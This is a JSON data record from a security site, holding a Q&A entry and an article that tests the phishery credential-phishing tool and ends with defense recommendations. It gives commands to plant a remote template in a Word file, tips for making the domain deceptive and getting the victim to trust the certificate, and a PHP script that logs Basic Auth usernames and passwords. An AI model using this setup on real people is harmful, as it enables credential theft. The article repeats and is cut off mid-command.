[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmPbqrsgFdCL93vofy0lZLABdry5mUzrGA51zyGDQBdo":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},684,"What is phishery and how does it work to steal credentials?","Phishery is an SSL-enabled HTTP server that phishes for credentials via [Basic Authentication](\u002Fnews\u002Fphishing-credentials-via-basic-authentication-phishery-exploitation-test). It works by generating a malicious Word document containing a URL template that, when opened, triggers an HTTPS request to the attacker's server. The server responds with a 401 Unauthorized status and a `WWW-Authenticate: Basic` header, causing the victim's application to display a login prompt. The entered credentials are Base64-encoded and sent to the server, where they are recorded.","\u003Cp>Phishery is an SSL-enabled HTTP server that phishes for credentials via [Basic Authentication](\u002Fnews\u002Fphishing-credentials-via-basic-authentication-phishery-exploitation-test). It works by generating a malicious Word document containing a URL template that, when opened, triggers an HTTPS request to the attacker&#39;s server. The server responds with a 401 Unauthorized status and a `WWW-Authenticate: Basic` header, causing the victim&#39;s application to display a login prompt. The entered credentials are Base64-encoded and sent to the server, where they are recorded.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fphishing-credentials-via-basic-authentication-phishery-exploitation-test\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-phishery-and-how-does-it-work-to-steal-credentials-1777482393909","phishery, Basic Authentication, credential phishing, Word document template, SSL",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},170,"Phishing credentials via Basic Authentication (phishery) exploitation test","phishing-credentials-via-basic-authentication-phishery-exploitation-test","Test phishery for phishing credentials via Basic Authentication. Learn setup, exploitation, and defense tips for this SSL-enabled HTTP server tool.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>phishery is a simple SSL-enabled HTTP server primarily designed to phish for target credentials through basic authentication.\u003C\u002Fp>\u003Cp>This article will test it, introduce the testing details, analyze the implementation principles, and explore extended usage.\u003C\u002Fp>\u003Cp>phishery address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fryhanson\u002Fphishery\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>phishery practical testing\u003C\u002Fli>\u003Cli>Implementation principles\u003C\u002Fli>\u003Cli>Supplement 1: Using OpenSSH to create certificates\u003C\u002Fli>\u003Cli>Supplement 2: PHP implementation of Basic Authentication\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 phishery actual testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test system: Win7x64\u003C\u002Fp>\u003Cp>Download compiled program:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fryhanson\u002Fphishery\u002Freleases\u002Fdownload\u002Fv1.0.2\u002Fphishery1.0.2windows-amd64.tar.gz\u003C\u002Fp>\u003Ch3>1. Generate Word document\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>phishery -u https:\u002F\u002Fsecure.site.local\u002Fdocs -i good.docx -o bad.docx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>https:\u002F\u002Fsecure.site.local\u002Fdocs serves as the spoofed web server address, docs is the file name (this file must exist, default corresponds to template.dotx). When the target user opens bad.docx, this domain will be displayed\u003C\u002Fli>\u003Cli>good.docx is the input Word document with normal content\u003C\u002Fli>\u003Cli>bad.docx is the output Word document, inserting Word document template into good.docx\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017261665_0_d5e3c5057a.jpeg\">\u003C\u002Fp>\u003Ch3>2. Start HTTPS Auth Server\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>phishery\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The configuration file loaded by default is settings.json in the same directory.\u003C\u002Fp>\u003Cp>The content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>{\u003Cbr>  \"ip\": \"0.0.0.0\",\u003Cbr>  \"port\": \"443\",\u003Cbr>  \"sslCert\": \"server.crt\",\u003Cbr>  \"sslKey\": \"server.key\",\u003Cbr>  \"basicRealm\": \"Secure Document Gateway\",\u003Cbr>  \"responseStatus\": 200,\u003Cbr>  \"responseFile\": \"template.dotx\",\u003Cbr>  \"responseHeaders\": [\u003Cbr>    [\"Content-Type\", \"application\u002Fvnd.openxmlformats-officedocument.wordprocessingml.template\"]\u003Cbr>  ]\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>server.crt and server.key are the test certificate files included in the project; the method for generating certificate files will be introduced later.\u003C\u002Fp>\u003Cp>By default, the obtained target user credentials are saved in the file credentials.json.\u003C\u002Fp>\u003Cp>The program runs as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017286418_1_4eab30e097.jpeg\">\u003C\u002Fp>\u003Ch3>3. Trick the target user into clicking on bad.docx\u003C\u002Fh3>\u003Cp>The target user must meet the following conditions:\u003C\u002Fp>\u003Ch4>(1) Able to resolve the domain name\u003C\u002Fh4>\u003Cp>You can choose one of the following three methods:\u003C\u002Fp>\u003Cp>Method 1: Through the domain name provider, resolve the domain name to the IP address of the HTTPS Auth Server\u003C\u002Fp>\u003Cp>The domain name needs to be deceptive\u003C\u002Fp>\u003Cp>Method 2: Modify the gateway configuration to resolve the domain name to the IP address of the HTTPS Auth Server\u003C\u002Fp>\u003Cp>Requires permission to modify the gateway configuration\u003C\u002Fp>\u003Cp>Method 3: Modify the hosts file in the target user's test environment to resolve the domain name to the IP address of the HTTPS Auth Server\u003C\u002Fp>\u003Cp>For testing purposes only\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Directly using an IP address is also possible, but it lacks deception.\u003C\u002Fp>\u003Ch4>(2) Trust the certificate file of the HTTPS Auth Server\u003C\u002Fh4>\u003Cp>You can choose from the following three methods:\u003C\u002Fp>\u003Cp>Method 1: The certificate file of the HTTPS Auth Server is issued by an authoritative CA, and the target trusts that CA\u003C\u002Fp>\u003Cp>Send the CSR file to the CA for verification. If approved, the CA uses its private key to sign the CSR file, generating a certificate file (.crt file)\u003C\u002Fp>\u003Cp>Method 2: Use a trusted certificate\u003C\u002Fp>\u003Cp>Method 3: The target user adds trust for the certificate\u003C\u002Fp>\u003Cp>Install the self-signed certificate into the trusted root certification authorities\u003C\u002Fp>\u003Cp>If the target user does not trust the certificate file of the HTTPS Auth Server, a prompt will appear when opening the document, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017317475_2_9aa14e868d.jpeg\">\u003C\u002Fp>\u003Cp>Only if the user selects Yes, will the dialog box for entering credentials pop up, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017357761_3_722cc0fb4c.jpeg\">\u003C\u002Fp>\u003Cp>The domain name in the dialog box is the same as the forged web server address\u003C\u002Fp>\u003Cp>After the target user enters the credentials, the HTTPS Auth Server obtains the user-input credentials, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017387876_4_95050b7565.jpeg\">\u003C\u002Fp>\u003Cp>Next, display the normal content of the Word document\u003C\u002Fp>\u003Ch2>0x03 Implementation Principle\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Basic Authentication\u003C\u002Fh3>\u003Cp>When a client accesses a server, if the server returns 401 Unauthorized and the Response header is WWW-Authenticate: Basic realm=\"xxxx\"\u003C\u002Fp>\u003Cp>the client will automatically pop up a login window, prompting the user to enter a username and password\u003C\u002Fp>\u003Cp>For example, accessing https:\u002F\u002Fsecure.site.local\u002Fdocs via IE triggers a dialog box, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017413188_5_fb7cd3c470.jpeg\">\u003C\u002Fp>\u003Cp>After the client enters the username and password, they are encrypted using base64 encoding and sent\u003C\u002Fp>\u003Ch3>2. Word Document Template\u003C\u002Fh3>\u003Cp>A Word document template can insert a URL, which is automatically accessed when the Word document is opened\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Must use https; http is not supported\u003C\u002Fp>\u003Cp>Viewing method:\u003C\u002Fp>\u003Cp>Developer Tools -&gt; Add-ins\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017458624_6_4d838b7241.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Excel and PowerPoint cannot use this method\u003C\u002Fp>\u003Ch3>3. The server receives the message, performs base64 decryption to obtain the username and password\u003C\u002Fh3>\u003Cp>Corresponding program source code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fryhanson\u002Fphishery\u002Fblob\u002Fmaster\u002Fphish\u002Fphishery.go#L50\u003C\u002Fp>\u003Ch2>0x04 Supplement 1: Creating certificates using openssh\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Install openssh\u003C\u002Fh3>\u003Cp>Ubuntu:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sudo apt-get install openssl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Windows:\u003C\u002Fp>\u003Cp>Download Apache, address as follows:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fhttpd.apache.org\u002Fdownload.cgi\u003C\u002Fp>\u003Cp>After installing Apache, OpenSSL is installed by default, located in \\Apache24\\bin\u003C\u002Fp>\u003Ch3>2. Generate the private key file test.com.key and the certificate signing request test.com.csr\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>openssl x509 -req -days 3650 -in test.com.csr -signkey test.com.key -out test.com.crt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the certificate lacks Subject Alternate Name (SAN), it needs to be added via a configuration file\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.citrix.com\u002Farticle\u002FCTX135602_\u003C\u002Fp>\u003Cp>Create a new file req.cnf with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[req]\u003Cbr>distinguished_name = req_distinguished_name\u003Cbr>x509_extensions = v3_req\u003Cbr>prompt = no\u003Cbr>[req_distinguished_name]\u003Cbr>C = US\u003Cbr>ST = VA\u003Cbr>L = SomeCity\u003Cbr>O = MyCompany\u003Cbr>OU = MyDivision\u003Cbr>CN = test.com\u003Cbr>[v3_req]\u003Cbr>keyUsage = critical, digitalSignature, keyAgreement\u003Cbr>extendedKeyUsage = serverAuth\u003Cbr>subjectAltName = @alt_names\u003Cbr>[alt_names]\u003Cbr>DNS.1 = test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both CN and DNS.1 must be set to the domain name (test domain is test.com)\u003C\u002Fp>\u003Cp>Generate private key and self-signed certificate:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout test.com.key -out test.com.crt -config req.cnf -sha256\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For more parameter details, refer to the previous article \"CIA Hive Beacon Infrastructure Reproduction 2 – Using Apache mod_rewrite for HTTPS Traffic Distribution\"\u003C\u002Fp>\u003Ch2>0x05 Supplement 2: PHP Implementation of Basic Authentication\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>PHP environment set up using phpstudy\u003C\u002Fp>\u003Ch3>1. Enable SSL in phpstudy\u003C\u002Fh3>\u003Ch4>(1) Modify the httpd.conf configuration file in the apache directory\u003C\u002Fh4>\u003Cp>Locate #LoadModule ssl_module modules\u002Fmod_ssl.so and remove the comment symbol #\u003C\u002Fp>\u003Cp>Add a line Include conf\u002Fvhosts_ssl.conf under # Secure (SSL\u002FTLS) connections\u003C\u002Fp>\u003Ch4>(2) Create the file vhosts_ssl.conf in the conf folder\u003C\u002Fh4>\u003Cp>Content as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Listen 443\u003Cbr>SSLStrictSNIVHostCheck off\u003Cbr>SSLCipherSuite AESGCM:ALL:!DH:!EXPORT:!RC4:+HIGH:!MEDIUM:!LOW:!aNULL:!eNULL\u003Cbr>SSLProtocol all -SSLv2 -SSLv3\u003Cbr>\u003Cvirtualhost *:443=\"\">\u003Cbr>    DocumentRoot \"C:\\WWW\"\u003Cbr>    ServerName test.com\u003Cbr>  \u003Cdirectory \"c:\\www\"=\"\">\u003Cbr>      Options FollowSymLinks ExecCGI\u003Cbr>      AllowOverride All\u003Cbr>      Order allow,deny\u003Cbr>      Allow from all\u003Cbr>      Require all granted\u003Cbr>  \u003C\u002Fdirectory>\u003Cbr>SSLEngine on\u003Cbr>SSLCertificateFile \"C:\\Apache\\conf\\ssl\\test.com.crt\"\u003Cbr>SSLCertificateKeyFile \"C:\\Apache\\conf\\ssl\\test.com.key\"\u003Cbr>\u003C\u002Fvirtualhost>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Restart phpstudy\u003C\u002Fh4>\u003Cp>Access https:\u002F\u002F127.0.0.1 for verification\u003C\u002Fp>\u003Ch3>2. Implement Basic Authentication in PHP, record user credentials\u003C\u002Fh3>\u003Cp>The PHP code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?php\u003Cbr-->if(!isset($_SERVER['PHP_AUTH_USER']) or !isset($_SERVER['PHP_AUTH_PW']))\u003Cbr>{\u003Cbr>\tfile_put_contents(\"log.txt\",\"ClientIP:\".$_SERVER['REMOTE_ADDR'].\"\\r\\n\",FILE_APPEND);\u003Cbr>\theader('WWW-Authenticate: Basic realm=\"Document Security\"');\u003Cbr>\theader('HTTP\u002F1.0 401 Unauthorized');\u003Cbr>} \u003Cbr>else \u003Cbr>{\u003Cbr>\tfile_put_contents(\"log.txt\",\"ClientIP:\".$_SERVER['REMOTE_ADDR'].\",\".$_SERVER['PHP_AUTH_USER'].\":\".$_SERVER['PHP_AUTH_PW'].\"\\r\\n\",FILE_APPEND);\u003Cbr>    print \"File Not Found\";\t\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The code implements recording user credentials and writing them to the file log.txt, returning 'File Not Found' to the user.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This PHP script can serve as a HTTPS Auth Server for Phishery\u003C\u002Fp>\u003Cp>Implementing Basic Authentication via PHP; if HTTPS is not used, the pop-up dialog will display additional prompts, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017474367_7_23719be008.jpeg\">\u003C\u002Fp>\u003Cp>If HTTPS is not used, it cannot be inserted as a Word document template into a Word document\u003C\u002Fp>\u003Ch2>0x06 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Detected actual attack activities:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fresearchcenter.paloaltonetworks.com\u002F2018\u002F08\u002Funit42-darkhydrus-uses-phishery-harvest-credentials-middle-east\u002F\u003C\u002Fp>\u003Cp>Based on the analysis in this article and the details of the actual attack activities, the following recommendations are provided:\u003C\u002Fp>\u003Cul>\u003Cli>Normal Word documents rarely require users to input credentials\u003C\u002Fli>\u003Cli>Check the domain's certificate (for HTTPS)\u003C\u002Fli>\u003Cli>Identify whether the domain name is forged\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests Phishery, introduces the testing details, analyzes the implementation principles, supplements the method of implementing Basic Authentication with PHP, and finally provides defense recommendations.\u003C\u002Fp>\u003Cp>In my opinion, another function of phishery is to use a Windows host on the internal network as a server to record credentials entered by the target.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>phishery is a simple SSL-enabled HTTP server primarily designed to phish for target credentials through basic authentication.\u003C\u002Fp>\u003Cp>This article will test it, introduce the testing details, analyze the implementation principles, and explore extended usage.\u003C\u002Fp>\u003Cp>phishery address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fryhanson\u002Fphishery\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>phishery practical testing\u003C\u002Fli>\u003Cli>Implementation principles\u003C\u002Fli>\u003Cli>Supplement 1: Using OpenSSH to create certificates\u003C\u002Fli>\u003Cli>Supplement 2: PHP implementation of Basic Authentication\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 phishery actual testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test system: Win7x64\u003C\u002Fp>\u003Cp>Download compiled program:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fryhanson\u002Fphishery\u002Freleases\u002Fdownload\u002Fv1.0.2\u002Fphishery1.0.2windows-amd64.tar.gz\u003C\u002Fp>\u003Ch3>1. Generate Word document\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>phishery -u https:\u002F\u002Fsecure.site.local\u002Fdocs -i good.docx -o bad.docx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>https:\u002F\u002Fsecure.site.local\u002Fdocs serves as the spoofed web server address, docs is the file name (this file must exist, default corresponds to template.dotx). When the target user opens bad.docx, this domain will be displayed\u003C\u002Fli>\u003Cli>good.docx is the input Word document with normal content\u003C\u002Fli>\u003Cli>bad.docx is the output Word document, inserting Word document template into good.docx\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017261665_0_d5e3c5057a-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Start HTTPS Auth Server\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>phishery\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The configuration file loaded by default is settings.json in the same directory.\u003C\u002Fp>\u003Cp>The content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>{\u003Cbr>  \"ip\": \"0.0.0.0\",\u003Cbr>  \"port\": \"443\",\u003Cbr>  \"sslCert\": \"server.crt\",\u003Cbr>  \"sslKey\": \"server.key\",\u003Cbr>  \"basicRealm\": \"Secure Document Gateway\",\u003Cbr>  \"responseStatus\": 200,\u003Cbr>  \"responseFile\": \"template.dotx\",\u003Cbr>  \"responseHeaders\": [\u003Cbr>    [\"Content-Type\", \"application\u002Fvnd.openxmlformats-officedocument.wordprocessingml.template\"]\u003Cbr>  ]\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>server.crt and server.key are the test certificate files included in the project; the method for generating certificate files will be introduced later.\u003C\u002Fp>\u003Cp>By default, the obtained target user credentials are saved in the file credentials.json.\u003C\u002Fp>\u003Cp>The program runs as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017286418_1_4eab30e097-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Trick the target user into clicking on bad.docx\u003C\u002Fh3>\u003Cp>The target user must meet the following conditions:\u003C\u002Fp>\u003Ch4>(1) Able to resolve the domain name\u003C\u002Fh4>\u003Cp>You can choose one of the following three methods:\u003C\u002Fp>\u003Cp>Method 1: Through the domain name provider, resolve the domain name to the IP address of the HTTPS Auth Server\u003C\u002Fp>\u003Cp>The domain name needs to be deceptive\u003C\u002Fp>\u003Cp>Method 2: Modify the gateway configuration to resolve the domain name to the IP address of the HTTPS Auth Server\u003C\u002Fp>\u003Cp>Requires permission to modify the gateway configuration\u003C\u002Fp>\u003Cp>Method 3: Modify the hosts file in the target user's test environment to resolve the domain name to the IP address of the HTTPS Auth Server\u003C\u002Fp>\u003Cp>For testing purposes only\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Directly using an IP address is also possible, but it lacks deception.\u003C\u002Fp>\u003Ch4>(2) Trust the certificate file of the HTTPS Auth Server\u003C\u002Fh4>\u003Cp>You can choose from the following three methods:\u003C\u002Fp>\u003Cp>Method 1: The certificate file of the HTTPS Auth Server is issued by an authoritative CA, and the target trusts that CA\u003C\u002Fp>\u003Cp>Send the CSR file to the CA for verification. If approved, the CA uses its private key to sign the CSR file, generating a certificate file (.crt file)\u003C\u002Fp>\u003Cp>Method 2: Use a trusted certificate\u003C\u002Fp>\u003Cp>Method 3: The target user adds trust for the certificate\u003C\u002Fp>\u003Cp>Install the self-signed certificate into the trusted root certification authorities\u003C\u002Fp>\u003Cp>If the target user does not trust the certificate file of the HTTPS Auth Server, a prompt will appear when opening the document, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017317475_2_9aa14e868d-1.jpeg\">\u003C\u002Fp>\u003Cp>Only if the user selects Yes, will the dialog box for entering credentials pop up, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017357761_3_722cc0fb4c-1.jpeg\">\u003C\u002Fp>\u003Cp>The domain name in the dialog box is the same as the forged web server address\u003C\u002Fp>\u003Cp>After the target user enters the credentials, the HTTPS Auth Server obtains the user-input credentials, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017387876_4_95050b7565-1.jpeg\">\u003C\u002Fp>\u003Cp>Next, display the normal content of the Word document\u003C\u002Fp>\u003Ch2>0x03 Implementation Principle\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Basic Authentication\u003C\u002Fh3>\u003Cp>When a client accesses a server, if the server returns 401 Unauthorized and the Response header is WWW-Authenticate: Basic realm=\"xxxx\"\u003C\u002Fp>\u003Cp>the client will automatically pop up a login window, prompting the user to enter a username and password\u003C\u002Fp>\u003Cp>For example, accessing https:\u002F\u002Fsecure.site.local\u002Fdocs via IE triggers a dialog box, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017413188_5_fb7cd3c470-1.jpeg\">\u003C\u002Fp>\u003Cp>After the client enters the username and password, they are encrypted using base64 encoding and sent\u003C\u002Fp>\u003Ch3>2. Word Document Template\u003C\u002Fh3>\u003Cp>A Word document template can insert a URL, which is automatically accessed when the Word document is opened\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Must use https; http is not supported\u003C\u002Fp>\u003Cp>Viewing method:\u003C\u002Fp>\u003Cp>Developer Tools -&gt; Add-ins\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017458624_6_4d838b7241-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Excel and PowerPoint cannot use this method\u003C\u002Fp>\u003Ch3>3. The server receives the message, performs base64 decryption to obtain the username and password\u003C\u002Fh3>\u003Cp>Corresponding program source code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fryhanson\u002Fphishery\u002Fblob\u002Fmaster\u002Fphish\u002Fphishery.go#L50\u003C\u002Fp>\u003Ch2>0x04 Supplement 1: Creating certificates using openssh\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Install openssh\u003C\u002Fh3>\u003Cp>Ubuntu:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sudo apt-get install openssl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Windows:\u003C\u002Fp>\u003Cp>Download Apache, address as follows:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fhttpd.apache.org\u002Fdownload.cgi\u003C\u002Fp>\u003Cp>After installing Apache, OpenSSL is installed by default, located in \\Apache24\\bin\u003C\u002Fp>\u003Ch3>2. Generate the private key file test.com.key and the certificate signing request test.com.csr\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>openssl x509 -req -days 3650 -in test.com.csr -signkey test.com.key -out test.com.crt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the certificate lacks Subject Alternate Name (SAN), it needs to be added via a configuration file\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.citrix.com\u002Farticle\u002FCTX135602_\u003C\u002Fp>\u003Cp>Create a new file req.cnf with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[req]\u003Cbr>distinguished_name = req_distinguished_name\u003Cbr>x509_extensions = v3_req\u003Cbr>prompt = no\u003Cbr>[req_distinguished_name]\u003Cbr>C = US\u003Cbr>ST = VA\u003Cbr>L = SomeCity\u003Cbr>O = MyCompany\u003Cbr>OU = MyDivision\u003Cbr>CN = test.com\u003Cbr>[v3_req]\u003Cbr>keyUsage = critical, digitalSignature, keyAgreement\u003Cbr>extendedKeyUsage = serverAuth\u003Cbr>subjectAltName = @alt_names\u003Cbr>[alt_names]\u003Cbr>DNS.1 = test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both CN and DNS.1 must be set to the domain name (test domain is test.com)\u003C\u002Fp>\u003Cp>Generate private key and self-signed certificate:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout test.com.key -out test.com.crt -config req.cnf 